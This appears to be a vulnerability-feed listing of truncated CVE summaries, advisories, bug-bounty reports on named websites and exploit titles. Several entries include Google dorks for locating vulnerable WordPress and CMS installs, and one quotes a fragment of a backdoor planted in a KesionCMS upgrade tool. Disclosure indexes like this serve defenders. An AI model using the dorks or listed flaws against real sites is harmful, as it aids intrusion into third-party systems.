CVE-2016-2397

The cliserver implementation in Dell SonicWALL GMS, Analyzer, and UMA EM5000 7.2, 8.0, and 8.1 before Hotfix 168056 allows remote attackers to deserialize and execute arbitrary Java code via crafted XML data...

dermaremedies.in XSS vulnerability

Open Bug Bounty ID: OBB-128550 Description| Value ---|--- Affected Website:| dermaremedies.in Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Remediation Guide:| OWASP XSS Prevention Cheat...

mpsmortgageco.com Open Redirect vulnerability

Open Bug Bounty ID: OBB-124450 Description| Value ---|--- Affected Website:| mpsmortgageco.com Vulnerable Application:| Custom Code Vulnerability Type:| Open Redirect / CWE-601 CVSSv3 Score:| 3.4 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N Remediation Guide:| OWASP Open Redirect Cheat Sheet...

Wordpress weever-apps-20-mobile-web-apps Shell Upload Exploit

Exploit for php platform in category web applications Exploit Title: Wordpress weever-apps-20-mobile-web-apps Shell Upload Exploit Software Link: http://weeverapps.com/product/cms/ Version:all Version Google dork1: inurl:/wp-content/plugins/weever-apps-20-mobile-web-apps The code in...

Microsoft .NET Manifest Resource Information Disclosure Vulnerability

Talos Vulnerability Report TALOS-2015-0130 Microsoft .NET Manifest Resource Information Disclosure Vulnerability December 8, 2015 CVE Number CVE-2015-6114 Summary An exploitable information leak or denial of service vulnerability exists in the manifest resource parsing functionality of the .NET...

The vulnerability of the Oracle E-Business Suite system’s automation functionality allows a perpetrator to execute any code with administrator privileges.

The vulnerability of the Oracle Applications Technology Stack component in the Oracle E-Business Suite automation system is related to errors in the code. Exploiting this vulnerability allows a malicious actor to execute arbitrary code with administrator privileges remotely...

Hardcoded credentials

Qolsys IQ Panel aka QOL before 1.5.1 has hardcoded cryptographic keys, which allows remote attackers to create digital signatures for code by leveraging knowledge of a key from a different installation...

IBC Solar ServeMaster Source Code Vulnerability

ServeMaster TLP+ and Danfoss TLX Pro+ are web-based SCADA systems. A source code vulnerability exists in IBC Solar ServeMaster. An attacker could exploit this vulnerability to obtain source code for executable scripts...

Apple Mac OSX Regex Engine (TRE) - Integer Signedness Overflow

Apple Mac OSX Regex Engine TRE - Integer Signedness Overflow Source: https://code.google.com/p/google-security-research/issues/detail?id=429 The OS X regex engine function tretnfarunparallel contains the following code: int tbytes; ... if !matchtags numtags = 0; else numtags = tnfa-numtags; ... i...

The vulnerability of the Oracle E-Business Suite system for automating business activities allows a perpetrator to breach the confidentiality of protected information.

The vulnerability of the Oracle Applications component in the Oracle E-Business Suite system’s automation activities is related to errors in the code of the AD Utilities sub-component. Exploiting this vulnerability can allow a malicious actor, operating remotely, to compromise the confidentiality...

WordPress History Collection Plugin 1.1.1 download.php 任意文件下载

eLouai's Download ScriptERROR: download file NOT SPECIFIED. USE force-download.php?file=filepath"; exit; elseif ! fileexists $filename echo "eLouai's Download ScriptERROR: File not found. USE force-download.php?file=filepath"; exit; ; switch $fileextension case "pdf": $ctype="application/pdf";...

Adobe Flash - scale9Grid Use-After-Free

Source: https://code.google.com/p/google-security-research/issues/detail?id=380&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id There is a use-after-free issue if the scale9Grid setting is called on an object with a member that then frees display item. This issue occurs for...

CVE-2015-5523

The ParseValue function in lexer.c in tidy before 4.9.31 allows remote attackers to cause a denial of service crash via vectors involving multiple whitespace characters before an empty href, which triggers a large memory allocation...

RollJam — $30 Device That Unlocks Almost Any Car And Garage Door

We have talked a lot about car hacking. Recently researchers even demonstrated how hackers can remotely hijack Jeep Cherokee to control its steering, brakes and transmission. Now, researchers have discovered another type of car hack that can be used to unlock almost every car or garage door. You...

Newsletter 4.3 SQL Injection

------------------------ Exploit Title : Newsletter 4.3 SQL Injection Vulnerability Exploit Author : Ashiyane Digital Security Team Vendor Homepage: www.conpresso.de - www.conpresso4.de Google Dork ONE: intext:Module Newsletter 4.3 Google Dork TWO: Module Newsletter 4.3 by www.conpresso4.de Date ...

mobiles4everyone.com XSS vulnerability

Open Bug Bounty ID: OBB-57103 Description| Value ---|--- Affected Website:| mobiles4everyone.com Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Remediation Guide:| OWASP XSS Prevention Che...

Security Update for Microsoft SharePoint Enterprise Server 2013 (KB2881078)

A security vulnerability exists in Microsoft SharePoint Enterprise Server 2013 that could allow arbitrary code to run when a maliciously modified file is opened. This update resolves that vulnerability...

[SECURITY] [DLA 156-1] samba security update

Package : samba Version : 2:3.5.6dfsg-3squeeze12 CVE ID : CVE-2015-0240 Debian Bug : 779033 Richard van Eeden of Microsoft Vulnerability Research discovered that Samba, a SMB/CIFS file, print, and login server for Unix, contains a flaw in the netlogon server code which allows remote code executio...

kesionV8.0升9.0工具中被修改过加入后门

简要描述： 要是用到V8.0升9.0工具就会被入侵 详细说明： 直接从官方下载来的 KesionCMS V8.0升9.0工具 。 漏洞证明： 代码inc/include.asp和index.asp最后面的代码 这代码可干的事很多吧。 " Response.End End If StrLogText=StrLogText& sender Set Lzwudi=Server.CreateObject"Scripting.FileSystemObject" Set Lenovo=Lzwudi.OpenTextFileServer.MapPath"."&""&StrLogFile,8,True,...

ThinkPHP 3.0~3.2 SQL injection vulnerability in detail and use-vulnerability and early warning-the black bar safety net

! ThinkPHP 3.03.2 a target=SQL injection vulnerability in detail with the use of" style="border: 0px;" onload="return imgzoomthis,5 5 0;" onclick="javascript:window. openthis. src;" style="cursor:pointer;"/ 0x00 background thinkphp recent vulnerability frequency, this exploit belongs to the...